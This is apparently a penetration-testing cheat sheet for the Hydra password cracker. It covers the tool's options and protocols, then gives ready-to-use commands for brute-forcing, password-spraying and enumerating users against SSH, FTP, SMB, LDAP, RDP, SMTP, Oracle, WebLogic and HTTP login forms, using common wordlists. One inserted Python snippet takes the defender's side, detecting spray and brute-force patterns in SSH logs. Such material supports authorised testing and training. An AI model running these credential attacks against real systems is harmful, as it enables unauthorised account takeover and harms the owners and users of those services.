Hydra

Online password cracker: it attacks live network login services rather than cracking hashes offline.

For big lists of users, try the null password, the username as password, and the reversed username as password, without a wordlist. E.g.: hydra -L users.txt -e nsr $IP ssh -V

Help

hydra

Useful options

-C FILE   colon separated "login:pass" format, instead of -L/-P options
-e nsr    try "n" null password, "s" username=password, "r" try the reverse login as pass
-l username
-L file with usernames
-p password
-P file with passwords
-f / -F   exit when a login/pass pair is found
-t number of threads, default=16

Protocols

adam6500 afp asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) mysql5 ncp nntp oracle oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp radmin2 redis rexec rlogin rpcap rsh rtsp s7-300 sapr3 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Graphical Version

# Start XHydra, graphical version of hydra
xhydra

Usage Examples

# USERS can also be a specific account and not in a file. Example USERS=sa for mssql

# Brute force Oracle listener password
# Template (1521 is the listener's default port):
# ./hydra -P <password file> -t <number of threads> -s 1521 <target> oracle-listener
./hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener


# Bruteforce basic authentication
# Password: generate 6 chars, 0-9 and A-Z
# The target is given as a bare hostname; the service name (http-head) selects the protocol
hydra -L users.txt -x 6:6:1A domain.com http-head /path/
hydra -l admin -x 6:6:1A domain.com http-head /path/ -v

# Bruteforce same username as password, 6 chars 0-9A-Z
URL="domain.com"
URL_PATH="/"
hydra -l yourname -x 6:6:1A -e s "$URL" https-get "$URL_PATH"
# Verbose
hydra -l yourname -x 6:6:1A -e s "$URL" https-get "$URL_PATH" -v

hydra -C /usr/share/wordlists/user_pass.txt "$URL" https-get "$URL_PATH" -v


# Bruteforce using a combo file (login:pass per line)
URL="domain.com"
hydra -C /usr/share/wordlists/user_pass.txt -v "$URL" https-get

# Bruteforce login as password
URL="domain.com"
hydra -l yourname -x 6:6:1A -e s "$URL" https-get /path/login.php


# HTTPS POST login form: fields are "path:form parameters:text that marks a failed login"
# <FAILED_LOGIN_TEXT> is a placeholder for the application's failure message
hydra -l admin -P passwords.txt www.somesite.com https-post-form "/admin/login.php:parent%5Buname%5D=^USER^&parent%5Bpassword%5D=^PASS^&_adminLogin=YES&SAVE=Login:<FAILED_LOGIN_TEXT>"

# SSH
IP=x.x.x.x
hydra -s 22 -l root -P /usr/share/wordlists/rockyou.txt -t 16 $IP ssh

#------------------------
# Resume session
#------------------------
hydra -R

Bruteforce FTP

IP=x.x.x.x
CREDS=/home/kali/creds.txt
USERS=/usr/share/seclists/Usernames/Names/names.txt
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -t 10 -V -f -e nsr -L $USERS -P $WL ftp://$IP
hydra -t 10 -V -f -e nsr -C $CREDS ftp://$IP

Username=password & empty password

hydra -t 10 -V -f -e nsr -L $USERS ftp://$IP

Bruteforce Samba

IP=x.x.x.x
CREDS=/home/kali/creds.txt
USERS=/usr/share/seclists/Usernames/Names/names.txt
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -t 10 -V -f -e nsr -L $USERS -P $WL smb://$IP
hydra -t 10 -V -f -e nsr -C $CREDS smb://$IP

Bruteforce LDAP

USERS=users.txt
IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
PROTOCOL=ldap2 # or ldap3
hydra -t 10 -V -f -e nsr -L $USERS -P $WL $PROTOCOL://$IP

Password Spray

hydra -t 10 -V -f -L $USERS -p "MyDefaultPassword" $PROTOCOL://$IP

Try an empty password 😉

hydra -t 10 -V -f -L $USERS -p "" $PROTOCOL://$IP
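Defender's view of the spray pattern above, as an added example (not part of the original cheat sheet): a spray, even with -e nsr, produces only a few failures per account, so it is the number of distinct accounts failing from one source that gives it away. The OpenSSH "Failed password" log format, the constructed sample lines, the thresholds and the name classify_sources are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed OpenSSH auth-log lines (sample data, not from the original page).
SAMPLE_LOG = """\
Jan 10 10:00:01 host sshd[101]: Failed password for alice from 203.0.113.5 port 40001 ssh2
Jan 10 10:00:02 host sshd[102]: Failed password for invalid user bob from 203.0.113.5 port 40002 ssh2
Jan 10 10:00:03 host sshd[103]: Failed password for carol from 203.0.113.5 port 40003 ssh2
Jan 10 10:00:04 host sshd[104]: Failed password for dave from 203.0.113.5 port 40004 ssh2
Jan 10 10:05:01 host sshd[201]: Failed password for root from 198.51.100.7 port 50001 ssh2
Jan 10 10:05:02 host sshd[202]: Failed password for root from 198.51.100.7 port 50002 ssh2
Jan 10 10:05:03 host sshd[203]: Failed password for root from 198.51.100.7 port 50003 ssh2
Jan 10 10:05:04 host sshd[204]: Failed password for root from 198.51.100.7 port 50004 ssh2
Jan 10 10:05:05 host sshd[205]: Failed password for root from 198.51.100.7 port 50005 ssh2
Jan 10 10:09:00 host sshd[301]: Failed password for alice from 192.0.2.9 port 60001 ssh2
Jan 10 10:09:05 host sshd[302]: Accepted password for alice from 192.0.2.9 port 60002 ssh2
"""

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def classify_sources(log_text, spray_users=4, brute_attempts=5):
    """Map each suspicious source IP to 'spray' or 'bruteforce'.

    Thresholds are illustrative assumptions; tune them to your environment.
    """
    failures = defaultdict(lambda: defaultdict(int))  # ip -> user -> failed logins
    for line in log_text.splitlines():
        match = FAILED.search(line)
        if match:
            user, ip = match.groups()
            failures[ip][user] += 1

    verdicts = {}
    for ip, per_user in failures.items():
        if max(per_user.values()) >= brute_attempts:
            # Many guesses against one account: classic wordlist attack.
            verdicts[ip] = "bruteforce"
        elif len(per_user) >= spray_users:
            # Few guesses each against many accounts: stays under per-account
            # lockout, so only the distinct-account count reveals it.
            verdicts[ip] = "spray"
    return verdicts

if __name__ == "__main__":
    for ip, verdict in sorted(classify_sources(SAMPLE_LOG).items()):
        print(ip, verdict)
```
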

Bruteforce RDP

RDP does not reliably handle multiple threads.

IP=x.x.x.x
CREDS=/home/kali/creds.txt
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -l Administrator -P $WL -t 1 -s 3389 $IP rdp
hydra -t 1 -V -f -l administrator -P $WL rdp://${IP}
hydra -e nsr -C $CREDS -t 1 -s 3389 $IP rdp
hydra -l john -p doe rdp://192.168.0.1/firstdomainname
hydra -e nsr -l user1 -P $WL -t 1 -s 3389 rdp://${IP}/DOMAIN

Bruteforce SMTP

Bruteforce usernames

IP=x.x.x.x
# Pick one username list; the alternatives are commented out
USERS=/usr/share/seclists/Usernames/top-usernames-shortlist.txt
#USERS=/usr/share/seclists/Usernames/Names/names.txt
#USERS=/usr/share/seclists/Usernames/cirt-default-usernames.txt
hydra -L $USERS $IP smtp-enum
hydra smtp-enum://${IP}/vrfy -L $USERS
hydra smtp-enum://${IP}/rcpt -L $USERS

Bruteforce passwords

IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -e nsr -l root -P $WL $IP smtp
hydra -e nsr -l user@example.com -P $WL $IP smtp
# Non-default port: -s takes the port number (-S enables SSL and takes no argument)
hydra -e nsr -l user@example.com -P $WL -s 565 $IP smtp

Bruteforce HTTP Protocol

Login forms – HTTP POST

This module produces a lot of false positives when using the “failed login” message. Whenever possible, use the “success” message instead or use Burp Pro.

IP=x.x.x.x
PORT=80
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
FAILED_MSG="INVALID LOGIN"
#SUCCESS_MSG="logged in as"
SUCCESS_MSG="302 Found"
COOKIES="cookie1=value1"
hydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:$FAILED_MSG" -e nsr -l admin -P $WL -vV -f
hydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:S=$SUCCESS_MSG" -e nsr -l admin -P $WL -vV -f
hydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:$FAILED_MSG:H=Cookie: ${COOKIES}" -e nsr -l admin -P $WL -vV -f
hydra $IP -s $PORT http-form-post "/form/login.php:user=^USER^&pass=^PASS^:S=$SUCCESS_MSG:H=Cookie: ${COOKIES}" -e nsr -l admin -P $WL -vV -f

HTTP GET – Basic auth

IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
hydra -e nsr -L users.txt -P $WL $IP http-get /webdav/ -v

Bruteforce Oracle SIDs

See Oscanner in Oracle Database.

IP=x.x.x.x
hydra -L /usr/share/oscanner/services.txt -s 1521 $IP oracle-sid

Bruteforce Oracle Weblogic

IP=x.x.x.x
WL=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt
#WL=/usr/share/wordlists/rockyou.txt
# $WL is a wordlist file, so it is passed with -P (file), not -p (single password)
hydra -e nsr -s 7879 -v -l weblogic -P $WL -t 4 -w 5 -F -m "/" $IP https-get
hydra -e nsr -s 443 -v -l weblogic -P $WL -t 4 -w 5 -F -m "/" $IP https-get